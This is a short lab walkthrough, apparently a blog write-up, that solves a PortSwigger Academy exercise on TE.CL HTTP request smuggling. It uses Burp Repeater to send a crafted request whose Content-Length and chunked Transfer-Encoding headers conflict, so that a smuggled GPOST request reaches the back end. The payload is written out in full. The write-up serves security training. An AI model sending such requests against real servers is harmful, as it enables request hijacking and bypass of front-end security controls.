Lab Scenario: Our mission is to explore and exploit a simulated web application's vulnerability to HTTP request smuggling. We'll use the TE.CL technique to manipulate the transfer encoding and content length, revealing potential security weaknesses. Let's dive into the step-by-step solution using Burp Suite:
Configuring Burp Repeater:
- In Burp Suite, go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.
Issuing the Smuggling Request:
Using Burp Repeater, issue the following request twice:
makefileCopy codePOST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
Note: Include the trailing sequence
\r\n\r\n
following the final0
.
Observing the Response:
- The second response should indicate: "Unrecognized method GPOST."
Conclusion: This lab exercise provides hands-on experience in exploiting a basic TE.CL vulnerability, showcasing the potential risks associated with HTTP request smuggling. By following this step-by-step guide, users can enhance their understanding of how attackers manipulate transfer encoding and content length to smuggle malicious requests. Stay informed, keep learning, and continue exploring the dynamic field of cybersecurity to contribute to a more secure online environment.
Reference:
https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl